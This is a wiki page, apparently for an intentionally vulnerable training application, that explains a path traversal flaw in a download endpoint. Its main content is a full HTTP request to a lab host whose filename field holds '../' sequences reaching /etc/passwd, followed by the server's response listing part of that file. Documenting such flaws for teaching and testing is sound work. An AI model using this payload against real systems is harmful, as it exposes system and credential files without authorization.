
Path Traversal

Sam Sanoop edited this page Jul 31, 2021 · 1 revision

Introduction

Path Traversal allows attackers to traverse the file system to access files or directories that are outside of the restricted directory.

Details

Within the storage area it is possible to upload files, which are stored on the local file system; these can then be fetched using the Download feature.

Storage Area

The filename field in the following HTTP request is used directly to locate the file on disk, so it can be manipulated to read arbitrary files from the system.

POST /api/download HTTP/1.1
Host: target.local
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: application/json, text/plain, */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=utf-8
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoidGVzdCIsInBlcm1pc3Npb25zIjpbInVzZXI6cmVhZCIsInVzZXI6d3JpdGUiXSwiaWF0IjoxNjI3NzcxODYyLCJleHAiOjE2Mjc5NDQ2NjIsImlzcyI6Imh0dHBzOi8vZ2l0aHViLmNvbS9zbm9vcHlzZWN1cml0eSJ9.CnNr3tJzn3yBG7RFoSJ_fy8eMbq634BXeSXYzHhAyVE
Content-Length: 49
Origin: http://target.local
Connection: close
Referer: http://target.local/upload.html

{"filename":"../../../../../../../../etc/passwd"}

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: http://target.local
Vary: Origin
Access-Control-Allow-Credentials: true
Content-Disposition: attachment; filename="passwd"
Accept-Ranges: bytes
Cache-Control: public, max-age=0
Last-Modified: Tue, 01 Jun 2021 10:32:04 GMT
ETag: W/"b12-179c7216463"
Content-Type: application/octet-stream
Content-Length: 2834
Date: Sat, 31 Jul 2021 23:00:49 GMT
Connection: close

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
....